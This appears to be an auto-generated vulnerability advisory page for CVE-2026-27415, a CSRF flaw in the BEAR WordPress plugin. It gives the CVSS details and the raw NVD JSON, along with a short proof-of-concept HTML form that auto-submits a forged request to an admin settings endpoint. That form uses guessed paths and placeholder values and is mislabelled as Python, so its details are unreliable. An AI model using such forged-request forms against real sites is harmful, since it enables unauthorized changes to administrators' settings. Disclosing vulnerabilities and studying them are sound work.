Security Vulnerability Report
中文
CVE-2026-27415 CVSS 4.3 MEDIUM

CVE-2026-27415

Published: 2026-05-07 11:16:00
Last Modified: 2026-05-07 14:08:07

Description

Cross-Site Request Forgery (CSRF) vulnerability in PluginUs.Net BEAR allows Cross Site Request Forgery. This issue affects BEAR: from n/a through 1.1.5.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

PluginUs.Net BEAR <= 1.1.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Proof of Concept for CVE-2026-27415 --> <!-- Exploit: CSRF in PluginUs.Net BEAR --> <!-- Requirements: Target user must be logged in as admin --> <html> <body> <!-- Form targeting a vulnerable endpoint (example path) --> <form action="http://victim-site/wp-admin/admin.php?page=bea_bulk_editor_settings" method="POST"> <input type="hidden" name="action" value="save_options" /> <input type="hidden" name="some_setting" value=" malicious_payload " /> <input type="submit" value="Submit Request" /> </form> <script> // Automatically submit the form when the page loads history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27415", "sourceIdentifier": "[email protected]", "published": "2026-05-07T11:15:59.983", "lastModified": "2026-05-07T14:08:07.340", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in PluginUs.Net BEAR allows Cross Site Request Forgery.\n\nThis issue affects BEAR: from n/a through 1.1.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/woo-bulk-editor/vulnerability/wordpress-bear-plugin-1-1-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}